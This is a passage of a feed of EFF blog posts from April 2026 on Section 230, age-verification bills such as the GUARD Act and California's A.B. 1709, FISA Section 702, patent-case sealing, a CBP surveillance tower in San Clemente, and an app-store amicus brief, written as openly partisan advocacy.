    If you want to overthrow Big Tech, you’ll need Section 230. The paradigm shift being built with the Open Social Web can put communities back in control of social media infrastructure, and finally end our dependency on enshitified corporate giants. But while these incumbents can overcome multimillion-dollar lawsuits, the small host revolution could be picked off one by one without the protections offered by 230. The internet as we know it is built on Section 230, a law from the 90s that generally says internet users are legally responsible for their own speech — not the services hosting their speech. The purpose of 230 was to enable diverse forums for speech online, which defined the early internet. These scattered online communities have since been largely captured by a handful of multi-billion dollar companies that found profit in controlling your voice online. While critics are rightly concerned about this new corporate influence and surveillance, some look to diminishing Section 230 as the nuclear option to regain control.  The thing is, that would be a huge gift to Big Tech, and detrimental to our best shot at actually undermining corporate and state control of speech online.  Dethroning Big Tech We’re fed up with legacy social media trapping us in walled gardens, where the world's biggest companies like Google and Meta call the shots. Our communities, and our voices, are being held hostage as billionaires’ platforms surveil, betray, and censor us. We’re not alone in this frustration, and fortunately, people are collaborating globally to build another way forward: the Open Social Web.  This new infrastructure puts the public’s interest first by reclaiming the principles of interoperability and decentralization from the early internet. In short, it puts protocols over platforms and lets people own their connections with others. Whether you choose a Fediverse app like Mastodon or an ATmosphere app like Bluesky, your audience and community stay within reach. 
It’s a vision of social media akin to our lives offline: you decide who to be in touch with and how, and no central authority can threaten to snuff out those connections. It’s social media for humans, not advertisers and authoritarians. Behind that vision is a beautiful mess of protocols bringing open social media to life. Each protocol is a unique language for applications, determining how and where messages are sent. While this means there is great variety to these projects, it also means everyone who spins up a server, develops an app, or otherwise hosts others’ speech has skin in the game when it comes to defending Section 230. What exactly is Section 230? Section 230 protects freedom of expression online by protecting US intermediaries that make the internet work. Passed in 1996 to preserve new bubbling communities online, 230 enshrined important protections for free expression and the ability to block or filter speech you don’t want on your site. One portion is credited as the “26 words that created the internet”: “No provider or user of an interactive computer service shall be treated as the publisher or speaker of any information provided by another information content provider.”  In other words, this bipartisan law recognizes that speech online relies on intermediaries — services that deliver messages between users — and holding them potentially liable for any message they deliver would only stifle that speech. Intuitively, when harmful speech occurs, the speaker should be the one held accountable. The effect is that most civil suits against users and services based on others' speech can quickly be dismissed, avoiding the most expensive parts of civil litigation.  Section 230 was never a license to host anything online, however. It does not protect companies that create illegal or harmful content. Nor does Section 230 protect companies from intellectual property claims.  
What Section 230 has enabled is the freedom and flexibility for online communities to self-organize. Without the specter of one bad actor exposing the host(s) to serious legal threats, intermediaries can moderate how they see fit or even defer to volunteers within these communities. Why the Open Social Web Needs Section 230 The superpower of decentralized systems like the Fediverse is the ability for thousands of small hosts to each shoulder some of the burdens of hosting. No single site can assert itself as a necessary intermediary for everyone; instead, all must collaborate to ensure messages reach the intended audience. The result is something superior to any one design or mandate. It is an ecosystem that is greater than the sum of its parts, resilient to disruptions, and enables free experimentation with different approaches to community governance. The open social web’s kryptonite though, is the liability participants can face as intermediaries. A greater potential for liability comes with more interference from powerful interests in the form of legal threats, more monetary costs, and less space for nuance in moderation. And in practice, participants may simply stop hosting to avoid those risks. The end result is only the biggest and most resourced options can survive. This isn’t just about the hosts in the Open Social Web, like Mastodon instances or Bluesky PDSes. In the U.S., Section 230’s protections extend to internet users when they distribute another person’s speech. For example, Section 230 protects a user who forwards an email with a defamatory statement. On the open social web, that means when you pass along a message to others through sharing, boosting, and quoting, you’re not liable for the other user’s speech. The alternative would be a web where one misclick could open you up to a defamation lawsuit. 
Section 230 also applies to the infrastructure stack, too, like Internet service providers, content delivery networks, and domain or hosting providers. Protections even extend to the new experimental infrastructures of decentralized mesh networks. Beyond the existential risks to the feasibility of indie decentralized projects in the United States, weakening 230 protections would also make services worse. Being able to customize your social media experience from highly-curated to totally laissez-faire in the open social web is only possible when the law allows space for private experiments in moderation approaches. The algorithmically driven firehose forced on users by antiquated social media giants is driven by the financial interests of advertisers, and would only be more tightly controlled in a post-230 world. Defending 230 Laws aimed at changing 230 protections put decentralized projects like the open social web in a uniquely precarious position. That is why we urge lawmakers to take careful consideration of these impacts. It is also why the proponents and builders of a better web must be vigilant defenders of the legal tools that make their work possible.  The open social web embodies what we are protecting with Section 230. It’s our best chance at building a truly democratic public interest internet, where communities are in control.

  • The GUARD Act Isn’t Targeting Dangerous AI—It’s Blocking Everyday Internet Use
    by Joe Mullin on April 27, 2026 at 11:22 pm

    Lawmakers in Congress are moving quickly on the GUARD Act, an age-gating bill restricting minors’ access to a wide range of online tools, with a key vote expected this week. The proposal is framed as a response to alarming cases involving “AI companions” and vulnerable young users. But the text of the bill goes much further, and could require age gates even for search engines that use AI.  TAKE ACTION Tell Congress: oppose the guard act If enacted, the GUARD Act won’t just target a narrow category of risky chatbots. It would require companies to verify the age of every user — then block anyone under 18 from interacting with a huge range of online systems. It would block minors from everyday online tools, undermine parental guidance, and force adults to sacrifice their privacy. In the process, it would require services to implement speech-restricting and privacy-invasive age-verification systems for everyone—not just kids.  Under the GUARD Act’s broad definitions, a high school student could be barred from asking homework help tools questions about algebra problems. A teenager trying to return a product could be kicked out of a standard customer-service chat.  The concerns behind this bill are serious. There have been troubling reports of AI systems engaging in harmful interactions with young users, including cases involving self-harm. Those risks deserve attention. But they call for targeted solutions, like better safeguards and enforcement against bad actors, not sweeping restrictions. The bill’s sponsors say they’re targeting worst-case scenarios — but the bill regulates everyday use.  The GUARD Act’s Broad Definitions Reach Everyday Tools The problem starts with how the bill defines an “AI chatbot.” It covers any system that generates responses that aren’t fully pre-written by the developer or operator. Such a broad definition sweeps in the basic functionality of all AI-powered tools.  
Then there’s the definition of an “AI companion,” which minors are banned from using entirely. An AI companion is any chatbot that produces human-like responses and is designed to “encourage or facilitate” interpersonal or emotional interaction. That may sound aimed at simulated “friends” or therapy chatbots. But in practice, it’s much fuzzier.  Modern chatbots are designed to be conversational and helpful. A homework helper might say “good question” before walking a student through a problem. A customer service chatbot may respond empathetically to a complaint (“I’m sorry you’re having this problem.”) A general-purpose assistant might ask follow-up questions. All of these could be seen as facilitating “interpersonal” interaction — and triggering the GUARD Act.  Faced with steep penalties and unclear boundaries, companies are unlikely to take chances on letting young people use their online tools. They’ll block minors entirely or strip their tools down to something less useful for everyone. The result isn’t a narrow safeguard—it’s a broad restriction on everyday online interactions. Homework Question? Show ID And Call Your Parents Start with a student getting help with homework. Under the GUARD Act, the service must verify the user’s age using more than a simple checkbox—it must rely on a “reasonable age verification” measure, which could require a government ID or a third-party age-checking system. If the system decides a user is under 18, the company must decide if its tool qualifies as an “AI Companion.” If there’s any risk it does, the safest move is to block access entirely.  The same logic applies to everyday customer service. A teenager trying to fix an order issue gets routed to a chatbot, and the company faces a choice: build a full age-verification system for a routine interaction, or restrict access to avoid liability. Many will choose the latter. This isn’t a narrow restriction aimed at a few risky products. 
It’s a compliance regime that pushes companies to block or limit any product that generates text for minors, across the board.  ID Checks for Everyone The GUARD Act doesn’t just affect minors. The bill takes a big step towards an internet that only works when users are willing to upload a valid ID or comply with other invasive age-verification schemes. Companies must verify the age of every user—not through a simple self-declaration, but through a “reasonable age verification” system tied to the individual.  In practice, that means collecting sensitive personal information: government IDs, financial data, or biometric identifiers. Companies can outsource verification, but they remain legally responsible. And the law requires ongoing verification, so this isn’t a one-time check. Worse, studies consistently show that millions of people have outdated information on their IDs, such as an old address, or do not have government ID. Should services require ID, many folks without current or any ID will be shut out.  And for those who do have compliant ID, turning over this information repeatedly creates obvious risks. Databases of sensitive identity information become targets for breaches. Anonymous or pseudonymous use of online tools becomes harder or impossible.  To keep minors away from certain chatbots, the GUARD Act would require everyone to prove who they are just to use basic online tools. That’s a steep tradeoff. And it doesn’t actually address the specific harms the bill is supposed to solve. Vague Definitions, Huge Penalties The GUARD Act’s broad scope is enforced with steep penalties. Companies can face fines of up to $100,000 per violation, enforced by federal and state officials. At the same time, key terms like “AI companion” rely on vague concepts such as “emotional interaction.” That combination will lead to overblocking. Faced with legal uncertainty and serious liability, companies won’t parse small distinctions. 
They’ll restrict access, limit features, or block minors entirely. That is the unfortunate result of the GUARD Act, even though the concerns animating it are worthy of fixing. But the GUARD Act’s broad terms will apply far beyond the concerning scenarios.  In the end, that means a more restricted and more surveilled internet. Teenagers would lose access to tools they rely on for school and everyday tasks. Everyone else faces new barriers, including ID checks. Smaller developers, who aren’t able to absorb compliance costs and legal risk, would be pushed out, leaving the largest companies even more dominant.  Young people — and all people — deserve protection from genuinely harmful products. But this bill doesn’t do that. It trades away privacy, access, and useful technology in exchange for a blunt system that misses the mark.  Congress could act soon. Tell them to reject the GUARD Act.  TAKE ACTION Tell Congress: say no to mandatory online id checks

  • Congress Must Reject New Insufficient 702 Reauthorization Bill
    by Matthew Guariglia on April 27, 2026 at 9:55 pm

    Speaker Johnson has introduced a new fig leaf over the American surveillance state, the Foreign Intelligence Accountability Act. Introduced with only days to go before Section 702 of the Foreign Intelligence Surveillance Act (FISA) expires and the U.S. government loses one of its most invasive surveillance programs, the bill does nothing to make any of the substantial changes privacy advocates have been asking for --- most notably, it fails to give us a real warrant requirement for the FBI to snoop through the private conversations of people on U.S. soil.   Section 702 needs to be reauthorized by Congress every few years. These reauthorizations give us a chance to tinker with the language of the law and introduce some much-needed reforms. This attempt at reauthorization has been particularly fraught, but there is still time for Congress to include real protection for Americans’ civil liberties and rights. We need to make sure that when an FBI agent wants to look through Americans’ conversations scooped up as part of a national security intelligence program, they need a warrant signed by a judge just as if they were trying to search your email account or your house.  This new bill mandates that a civil liberties protection officer at the Director of National Intelligence review all queries of U.S. persons made by the FBI under this program to make sure no laws have been broken. It’s bad enough to let the intelligence community police itself, and what’s more, the assessment for illegality would be made after a U.S. person has already been spied on. This is hardly the reform we need and will likely just lead to continued abuse with no real accountability or consequences.   The bill “prohibits targeting United States persons,” but so does current law. 
This “change” does absolutely nothing to address what’s really happening—which is that surveillance of people in the United States is usually justified as “incidental” because Americans aren’t the “target” of the surveillance. The bill does not create a warrant requirement, it does not create any new transparency requirements, and it does not protect Americans’ privacy.   We urge Congress, and we urge you to write to your Congresspeople, to tell them this: Reject the surveillance state’s latest smokescreen known as the Foreign Intelligence Accountability Act and keep pushing for real reforms.  

  • The Internet Still Works: SmugMug Powers Online Photography
    by Joe Mullin on April 27, 2026 at 5:44 pm

    SmugMug is a family-owned photo hosting and e-commerce platform that helps professional photographers run their businesses online. Founded in 2002, the company provides tools for photographers to show their work, deliver client galleries, sell prints, and manage payments.  In 2018, SmugMug purchased Flickr, the long-running photo-sharing community, which added tens of millions of active hobbyist photographers to the company’s user base.  Ben MacAskill is President and COO of SmugMug’s parent company, Awesome, which he co-founded with his family. Awesome also includes the media network This Week in Photo and the nonprofit Flickr Foundation, which focuses on preserving publicly available photography. MacAskill has been an active voice in policy discussions around Section 230 and online platform regulation. He was interviewed by Joe Mullin, a policy analyst on EFF's Activism Team. Joe Mullin:  How would you explain Section 230 to a SmugMug photographer who hasn't heard of it but relies on you to share their work, run their business. Ben MacAskill: Section 230 allows us to run our business. We are a small, family run business. We don’t have the resources to police every single upload, every single comment, or every single engagement that happens on the site.  That includes photographers who have comments on their sites. Anywhere there’s interaction online, Section 230 protects us.  It doesn't absolve us of liability. We can't run rampant and do anything we want. It  just helps protect us and make it scalable so that we can run our business. What would you have to change if Section 230 were eliminated or significantly narrowed?  Honestly, there's a high chance that it would bankrupt platforms like ours. They're not wildly profitable. If Section 230 is done away with, we have to [check] content that goes online to make sure we’re not liable. That means policing tens of millions of uploads per day.  That would kill the business of a lot of photographers. 
Can you imagine—you just got married, and you’re waiting for your wedding photos for a week or two because they’re in some moderation queue?  If we don’t have legal protections, and we get one nefarious customer—if something goes sideways—then I’m liable for that.  I don't, and can't possibly know, whether every single photo is appropriate or legal, as it's uploaded. We would literally have to moderate everything before it goes online. I don’t think any business can afford that, period. I guess you could have an offshore call-center type thing. Still, it would change the entire nature of the real-time internet. Imagine posting something to Instagram and having the platform say, “Cool, we’ll get back to you in 8 to 12 days.”  What kind of content moderation do you do on SmugMug?  If a user uploads something illegal, we will report them as soon as we find it. We're not protecting them. We don’t condone or allow illegal behavior. We work very closely with organizations, nonprofits and governmental agencies to detect CSAM—child exploitative material—and we report that to the National Center for Missing and Exploited Children. We will report users, we eliminate illegal content on our platforms—which is one reason we have such a low prevalence of that problem.  But that does take effort and time to find, and there is currently no perfect solution. The tech solutions that exist can’t detect it at 100% accuracy, or anywhere close. And with tens of millions of uploads a day, going through them one by one is impossible.  How do you think more generally about protecting user speech and creative expression?  On SmugMug, we’re really focusing on professionals running their business. So we don’t have to [weigh in] on content too much.  On Flickr, we are big proponents of expression and artistic creativity. Photographers have opinions! But we do draw the line at things like hate speech and harassment. We aggressively maintain a friendly platform. 
Our community guidelines are very specific, that you cannot harass other customers, you cannot upload stuff classified as hate speech, or threats, or anything along those lines.  Those rules are generally policed by the community. We do have some text analysis tools, but when community members feel harassed or threatened, reports will come in. We’ll address them on a one-by-one basis and remove harassing material from our platform.  Our ability to moderate is one of the things that makes Flickr what it is. If we lose the ability to enforce our own moderation rules—or have that legislated for us—then it changes the entire nature of the community. And not in a good way. Losing the ability to moderate would permanently and forever change what we've built. What kind of complaints or takedown requests do you receive, and how do you handle it, both in the U.S. and abroad?  Flickr is often referred to as the friendliest community online. You know, we're not dealing with a lot of hate. We're not dealing with a lot of threats. Under other frameworks, like the DMCA, we do takedowns on copyrighted material.  We’re able to handle it with a fully internal team, and we have a great track record. But the user base and the content base is so large that, if we had to assume that those tens of millions of uploads a day are problematic, the burden would be extreme.  We have a robust Trust and Safety Team, and we operate in every non-embargoed country on Earth. So we are subject to a lot of different laws and regulations: “likeness” rules and privacy rules in certain countries that don't exist here in the United States. Even state to state, there’s some varying laws. It’s a complicated framework, but we pay attention to it.  The globe responds in much the same way that Section 230 is working. That is, we operate on reports and discovery, not on pre-screening everything.  What do you think that policy makers most often misunderstand about how platforms like yours operate? 
One misconception is that we are not beholden to any laws. That Section 230 absolves us of any responsibility and any liability, and we can just do whatever we want. They talk about it as “reining in tech companies,” or “holding tech companies accountable.” But I am accountable for the content on my platform. We’re not given this “get out of jail free” card.  And I think they assume all platforms don’t really care about this, that anything that is done is done begrudgingly. But we’re very proactive about keeping a clean, polite, and friendly community. We are already very aggressively policing our platform.  And even legal content gets moderated, because it might just not be appropriate for a particular community.  We enforce our rules, and much the way that other private in-person businesses will enforce their rules. If you start screaming hateful things at patrons in a coffee shop, they’re going to throw you out. They want a quiet, chill vibe where people can sip their lattes. We’re doing the same sort of things.  As an independent family owned company you’re in an ecosystem dominated by much larger platforms. How are these issues different for you as a smaller service?  I think it's a much more existential threat for middle and small tech companies. It also shuts off the next generation of these platforms. The computer science student in a dorm room right now won't have the legal protections to launch, to even try to build something new. At least not here in the United States. 

  • Act Now to Stop California’s Paternalistic and Privacy-Destroying Social Media Ban
    by Molly Buckley on April 24, 2026 at 11:11 pm

    California lawmakers are fast-tracking A.B. 1709—a sweeping bill that would ban anyone under 16 from using social media and force every user, regardless of age, to verify their identity before accessing social platforms. That means that under this bill, all Californians would be required to submit highly sensitive government-issued ID or biometric information to private companies simply to participate in the modern public square. In the name of “safety,” this bill would destroy online anonymity, expose sensitive personal data to breach and abuse, and replace parental decision-making with state-mandated censorship. A.B. 1709 has already passed out of the Assembly Privacy and Judiciary Committees with nearly unanimous support. Its next stop is the Assembly Appropriations Committee, followed by a floor vote—likely within the next week. Take action Tell Your Representative to OPPOSE A.B. 1709 California Is About to Set a Dangerous Precedent for Online Censorship By banning access to social media platforms for young people under 16, California is emulating Australia, where early results show exactly what EFF and other critics predicted: overblocking by platforms, leaving youth without support and even adults barred from access; major spikes in VPN use and other workarounds ranging from clever to desperate; and smaller platforms shutting down rather than attempting costly compliance with these sweeping bills. California should not be racing to replicate those failures. After all, when California leads—especially on tech—other states follow. There is no reason for California to lead the nation into an unconstitutional social media ban that destroys privacy and harms youth. Take action Tell Your Representative to OPPOSE A.B. 1709 What’s Wrong With A.B. 1709? Just about everything. A.B. 1709 weaponizes legitimate parental concerns by using them to hand over even more censorship and surveillance power to the government. 
Beneath its shiny “protect the children” rhetoric, this bill is misguided, unconstitutional, and deeply harmful to users of all ages. A.B. 1709 Recklessly Violates Free Speech Rights The First Amendment protects the right to speak and access information, regardless of age. But by imposing a blanket ban on social media access, A.B. 1709 would cut off lawful speech for millions of California teenagers, while also forcing all users (adults and kids alike) to verify their ages before speaking or accessing information on social media. This will immensely and unconstitutionally chill Californians’ exercise of their First Amendment rights. These mandates ignore longstanding Supreme Court precedent that protects young people’s speech and consistently finds these bans unconstitutional. Banning young people entirely from social media is an extreme measure that doesn’t match the actual risks of online engagement. California simply does not have a valid interest in overriding parents’ and young people’s rights to decide for themselves how to use social media. After all, age-verification technology is far from perfect. A.B. 1709’s reliance on imperfect age-verification technology will disproportionately silence marginalized communities—those whose IDs don’t match their presentation, those with disabilities, trans and gender non-conforming folks, and people of color—who are most likely to be wrongfully denied access by discriminatory systems.   Finally, many people will simply refuse to give up their anonymity in order to access social media. Our right to anonymity has been a cornerstone of free expression since the founding of this country, and a pillar of online safety since the dawn of the internet. This is for good reason: it allows creativity, innovation, and political thought to flourish, and is essential for those who risk retaliation for their speech or associations. A.B. 1709 threatens to destroy it. AB 1709 Needlessly Jeopardizes Everyone’s Privacy A.B. 
1709’s age verification mandate also creates massive security risks by forcing users to hand over immutable biometric data and government IDs to third-party vendors. By creating centralized "honeypots" of sensitive information, the bill invites identity theft and permanent surveillance rather than actual safety. If we don’t trust tech companies with our private information now, we shouldn't pass a law that mandates we give them even more of it.  We’ve already seen repeated data breaches involving age- and identity-verification services. Yet A.B. 1709 would require millions more Californians—including the youth this bill claims to protect—to feed their most sensitive data into this growing surveillance ecosystem.  This is not the answer to online safety. Take action Tell Your Representative to OPPOSE A.B. 1709 AB 1709 Harms the Youth It Claims to Protect While framed as a safety measure, this bill serves as a blunt instrument of censorship, severing vital lifelines for California’s young people. Besides being unconstitutional, banning young people from the internet is bad public policy. After all, social media sites are not just sources of entertainment; they provide crucial spaces for young people to explore their identities—whether by creating and sharing art, practicing religion, building community, or engaging in civic life.  Social science indicates that moderate internet use is a net positive for teens’ development, and negative outcomes are usually due to either lack of access or excessive use. Social media provides essential spaces for civic engagement, identity exploration, and community building—particularly for LGBTQ+ and marginalized youth who may lack support in their physical environments. By replacing access to political news and health resources with state-mandated isolation, A.B. 1709 ignores the calls of young people themselves who favor digital literacy and education over restrictive government control. 
Young people have been loud and clear that what they want is access and education—not censorship and control. They even drafted their own digital literacy education bill, A.B. 2071, which is currently before the California legislature! Instead of cutting off vital lifelines, we should support education measures that would arm them (and the adults in their lives) with the knowledge they need to explore online spaces safely. AB 1709 Is Misguided and Won’t Work In case you needed more reasons to oppose this bill. A.B. 1709 Replaces Parenting With Government Control. Families know there is no one-size-fits-all solution to parenting. But AB 1709 imposes one anyway, overriding parental decision-making with a blanket censorship prohibition. Parents who want to actively guide their children’s online experiences should be empowered, not relegated to the sidelines by a blunt state mandate. A.B. 1709 Strengthens Big Tech Instead of Challenging It. Supporters claim that this bill will rein in the major tech companies, but in fact, steep fines and costly compliance regimes disproportionately harm smaller platforms. Where large corporations can afford to absorb legal risk and shell out for expensive verification systems, smaller forums and emerging platforms cannot. We’ve already seen platforms shut down or geoblock entire states in response to age-gating laws. And when the small platforms shutter, where do all of those users—and their valuable data—go? Straight back to the biggest companies. A.B. 1709 Creates Expensive and Shady Bureaucracy During a Budget Crisis. California is facing a massive deficit, but A.B. 1709 would waste taxpayer dollars to fund a shadowy new "e-Safety Advisory Commission" to enforce this ban and dream up new ways to censor the internet. In addition, lawmakers in support of A.B. 
1709 have already admitted that this bill is likely to follow the same path as other recent "child safety" laws that were struck down or blocked in court for First Amendment and privacy reasons. With A.B. 1709, taxpayers are being asked to hand over a blank check for millions in legal fees to defend a law that is unconstitutional on its face. Californians: Act Now to Kill This Bill A.B. 1709 is not an inevitability, as some supporters want you to believe. But we need to act now to support our youth and their right to participate in online public life. Your representatives could vote on A.B. 1709 as soon as next week. If you’re a Californian, email your legislators now and tell them to vote NO on AB 1709. Take action Tell Your Representative to OPPOSE A.B. 1709

  • EFF Challenges Secrecy In Eastern District of Texas Patent Case 
    by Betty Gedlu on April 24, 2026 at 10:57 pm

    Clinic students Emily Ko and Zoe Lee at the Technology Law and Policy Clinic at the NYU School of Law were the principal authors of this post. Courts are not private forums for business disputes. They are public institutions, and their records belong to the public. But too often, courts forget that and allow for massive over-sealing, especially in patent cases.  EFF recently discovered another case of this in the Eastern District of Texas, where key court filings about Wi-Fi technology used by billions of people every day were hidden entirely from public view. The public could not see the parties’ arguments about patent ownership, the plaintiff’s standing in court, or licensing obligations tied to standardized technologies. EFF Seeks to Uncover Sealed Information in Wilus  The case Wilus Institute of Standards and Technology Inc. v. HP Inc., highlights a recurring transparency problem in patent litigation.  Wilus claims to own standard essential patents (SEPs) related to Wi-Fi 6 — technology embedded in everyday devices. Wilus sued Samsung and HP for patent infringement. HP argued that Wilus failed to offer licenses on Fair, Reasonable, and Non-Discriminatory (FRAND) terms, which are required to prevent SEP holders from exploiting their position, by blocking fair access to widely used technologies.  In reviewing the docket, EFF found that many filings were improperly sealed under a lenient protective order without the required, specific justification needed in a proper motion to seal. Because there is a presumption of public access to court filings, litigants must file a motion to seal and demonstrate compelling reasons for secrecy. This typically requires a document-by-document and line-by-line justification.  In the Eastern District of Texas, that standard is often not enforced. 
Instead, district judges allow litigants to hide information using boilerplate justification in a protective order without explaining why specific documents or specific parts in a document should be hidden.  In Wilus, two sets of documents stood out.  First, Samsung moved to dismiss the case, arguing Wilus may not have validly obtained the patents — raising doubts about whether they had standing to sue at all. Wilus’s opposition to that motion was filed completely under seal, with no redacted public version available at all. That briefing likely addresses the patent assignment agreements that underpin Wilus’s business model — information the public has an interest in, especially in cases involving non-practicing entities (NPEs) like Wilus.  Second, filings related to HP’s supplemental briefing on FRAND obligations were also sealed in full, with no redacted versions available to the public. Whether Wilus is bound by FRAND has implications far beyond this case. Companies subject to FRAND must adhere to reasonable licensing terms, while those that are not can charge significantly higher licensing fees.  In both instances, the public was shut out of arguments that bear directly on how essential technologies are licensed and controlled. EFF Pushes For Public Access  EFF raised these concerns with Wilus’s counsel and pressed for public access to the sealed records. Wilus ultimately agreed to file redacted versions of several documents now available as Document Numbers 387, 388, and 389.  That result is progress, but it shouldn’t require outside intervention. Public versions of court filings should be the default, not something negotiated after outside pressure. Even now, these newly filed redacted versions conceal significant portions of the parties’ arguments. The public still cannot fully see how this case about technologies that are used every day is being litigated.  Why Public Access Matters  Sealing court records is designed to be rare. 
To overcome the presumption of public access, litigants must show compelling reasons for secrecy. That’s because open courts are a distinguishing feature of American democracy. The public, journalists, and policymakers all have the right to observe proceedings and hold both government actors and private litigants accountable.  Some filings do contain trade secrets or commercially sensitive information. But that doesn’t mean litigants should be able to hide information without explaining why. The Eastern District of Texas allows litigants to bypass the requirement to explain why. EFF confronted this very same issue in its attempt to intervene in another Eastern District of Texas case, Entropic v. Charter. The same pattern appeared again in Wilus: instead of narrowly tailored redactions supported by specific reasoning, filings were withheld wholesale.  Courts Must Enforce the Standard Courts, not third parties, are responsible for protecting the public’s right of access.  That means enforcing the “compelling reasons” standard, as a matter of course. Parties seeking to seal sensitive information should be required to justify each proposed redaction. The Eastern District of Texas’ current approach falls short. By allowing broad, unsupported sealing through expansive protective orders, it effectively treats judicial records as confidential by default.  Heavy caseloads don’t change the rule. Administrative burden cannot override constitutional and common law rights. Judicial records are presumptively public. Courts, including the Eastern District of Texas, should enforce that presumption.  Other Federal Courts Get It Right  The Eastern District of Texas is an outlier. In the Northern District of California, judges routinely reject overbroad sealing requests. As Judge Chhabria’s Civil Standing Order explains:  [M]otions to seal . . . are almost always without merit. . . . 
Federal courts are paid for by the public, and the public has the right to inspect court records, subject only to narrow exceptions.  The filing party must make a specific showing explaining why each document that it seeks to seal may justifiably be sealed . . . Generic and vague references to “competitive harm” are almost always insufficient justification for sealing.  This approach reflects the law: sealing must be narrowly tailored and specifically justified. Court Transparency is Fundamental  At first glance, secrecy in patent litigation may not seem alarming. But it signals a broader erosion of transparency. The widespread use of expansive protective orders in the Eastern District of Texas is a practice that risks spreading if courts do not enforce the law.  These practices allow private parties to obscure information about disputes involving technologies that shape modern life. That undermines a core principle of a free society: transparency regarding the actions of powerful actors.  Courts are not private forums for business disputes. They are public institutions, and their records belong to the public.  So long as these practices continue, EFF will keep advocating for transparency and working to vindicate the public’s right to access court records.

  • California Coastal Community Must Reject CBP's AI-Powered Surveillance Tower
    by Dave Maass on April 24, 2026 at 8:04 pm

    Customs and Border Protection (CBP) is seeking permission from the California city of San Clemente to install an Anduril Industries surveillance tower on a cliff that would allow for constant monitoring of entire coastal neighborhoods.  The proposed tower is Anduril's Sentry, part of the Autonomous Surveillance Tower (AST) program. While CBP says it will primarily monitor the coastline for boats carrying migrants, it will actually be installed 1.5 miles inland, overlooking the bulk of the 62,000-resident city. By CBP's own public statement, the system–which combines video, radar, and computer vision–is "constantly scanning" for movement and identifying and tracking objects an AI algorithm decides are of interest. Depending on the model–the photos provided by CBP indicate it is a long range maritime model–the camera could see as far as nine miles, which would cover the entire city and potentially see as far as neighboring Dana Point. "The AST utilize advanced computer vision algorithms to autonomously detect, identify, and track items of interest (IoI) as they transit through the towers field of view," CBP writes in a privacy threshold analysis. "The system can determine if an IoI is a human, animal, or vehicle without operator intervention. The system then generates and transmits an alert to operators with the location and images of the IoI for adjudication and response."  On April 28, local residents and Oakland Privacy, a privacy- and anti-surveillance-focused citizens’ coalition, are holding a town hall to inform the public about the dangers of this technology. We urge people to attend to better understand what's at stake.  "The planned deployment of an Anduril tower along a heavily used Orange County coastline 75 miles from the border demonstrates that the militarization of the border region is rapidly moving northwards and across the entire state," writes Oakland Privacy.  
City officials raised concerns about resident privacy and proposed that a lease agreement include a prohibition on surveilling neighborhoods. CBP rejected that proposal, instead saying that they would configure the tower to "avoid" scanning residential neighborhoods, but the system would remain capable of tracking human beings in residential areas. According to the staff report:  In response to privacy concerns, CBP has stated the system would be configured to avoid scanning residential areas that fall into the scan viewshed, focusing the system on the marine environment. CBP has maintained the purpose of the system is specifically maritime surveillance, and the system would be singularly focused on offshore activities. However, there may be an instance in which there is an active smuggling event, detected by the system at sea, in which the subsequent smuggling event traverses through the residential neighborhoods. In such a case, the system may continue to track and monitor. To restrict this functionality would be contrary to the spirit and intent of the deployment. Therefore, they cannot make such a contractual obligation. The Anduril towers retain a variety of data, including images and more.  The proposed Anduril surveillance tower. Source: City of San Clemente "The AST capture and retain imagery which occurs in plan view of the tower sites and is stored as an individual event with a unique event identified allowing replay of the event for further investigation or dismissal based on activity occurring," according to the privacy threshold analysis. The document indicates a potential 30-day retention period for imagery, but then contradicts itself to say that data will be held indefinitely to train algorithms: "AST will also be maintaining learning training data, these records should not be deleted." This means that taxpayers would be paying for the privilege of having their data turned into fuel for Anduril's product. 
In 2020 CBP said it would work with National Archives and Records Administration (NARA) to develop a retention schedule for training data (i.e., a timeline for deletion). However, when EFF filed a Freedom of Information Act (FOIA) request with NARA, the agency said there were no records of these discussions. Likewise, CBP has not provided records in response to the FOIA request EFF filed with them seeking the same records.  Anduril Maritime Sentry in San Diego, where the border fence meets the ocean. This would not be the first CBP tower placed along the coastline in California. EFF identified one in Del Mar, about 30 miles from the border, and another in San Diego County where the border fence meets the Pacific Ocean. CBP has also applied to place towers–although not necessarily the Anduril model–in or near several other coastal locations: Gaviota State Park, Refugio State Park, Vandenberg Air Force Base, Piedras Blancas and Point Vicente. The California coastline isn’t the only coastline dotted with surveillance towers. The Migrant Rights Network has also documented numerous Anduril towers along the southeast coast of England. Where the San Clemente tower would differ is that there is a substantial population between the tower and the beach, and because it's a 360-degree system, it can watch neighborhoods even further from the coast.  However, this won't be the first time an Anduril tower has been placed next to a community. EFF has documented numerous Anduril towers in public parks along the Rio Grande in Laredo and Roma, Texas. In Mission, Texas, an Anduril tower was placed outside an RV park: the tower could not even see the border without capturing data from the community. Because AI can swivel the cameras 360 degrees, two churches were within the "viewshed" of that tower.  Click here to view EFF's ongoing map of CBP surveillance towers. 
Many border surveillance towers are placed on city or county property, requiring a lease to be approved by the local governing body–as is the case with San Clemente. In 2024, EFF and Imperial Valley Equity and Justice organized an effort to fight the renewal of a Border Patrol's lease for a tower next to a public park. The coalition lost narrowly after a recall election ousted two officials who were critical of the lease. CBP is rapidly increasing the number of towers at the border and beyond, recently announcing the potential to install 1,500 more towers in the next few years–more than tripling what we've documented so far–at a cost of more than $400 million to the public for maintenance alone. This is despite more than 20 years of government reports that have documented how tower-based systems are ineffective and wasteful. It's time to fight back. 

  • EFF to 9th Circuit (Again): App Stores Shouldn’t Be Liable for Processing Payments for User Content
    by Sophia Cope on April 23, 2026 at 10:05 pm

    EFF filed an amicus brief for the second time in the U.S. Court of Appeals for the Ninth Circuit, arguing that allowing cases against the Apple, Google, and Facebook app stores to proceed could lead to greater censorship of users’ online speech. Our brief argues that the app stores should not lose Section 230 immunity for hosting “social casino” apps just because they process payments for virtual chips within those apps. Otherwise, all platforms that facilitate financial transactions for online content—beyond app stores and the apps and games they distribute—would be forced to censor user content to mitigate their legal exposure. Social casino apps are online games where users can buy virtual chips with real money but can’t ever cash out their winnings. The three cases against Apple, Google, and Facebook were brought by plaintiffs who spent large sums of money on virtual chips and even became addicted to these games. The plaintiffs argue that social casino apps violate various state gambling laws. At issue on appeal is the part of Section 230 that provides immunity to online platforms when they are sued for harmful content created by others—in this case, the social casino apps that plaintiffs downloaded from the various app stores and the virtual chips they bought within the apps. Section 230 is the foundational law that has, since 1996, created legal breathing room for internet intermediaries (and their users) to publish third-party content. Online speech is largely mediated by these private companies, allowing all of us to speak, access information, and engage in commerce online, without requiring that we have loads of money or technical skills. The lower court hearing the case ruled that the companies do not have Section 230 immunity because they allow the social casino apps to use the platforms’ payment processing services for the in-app purchasing of virtual chips. 
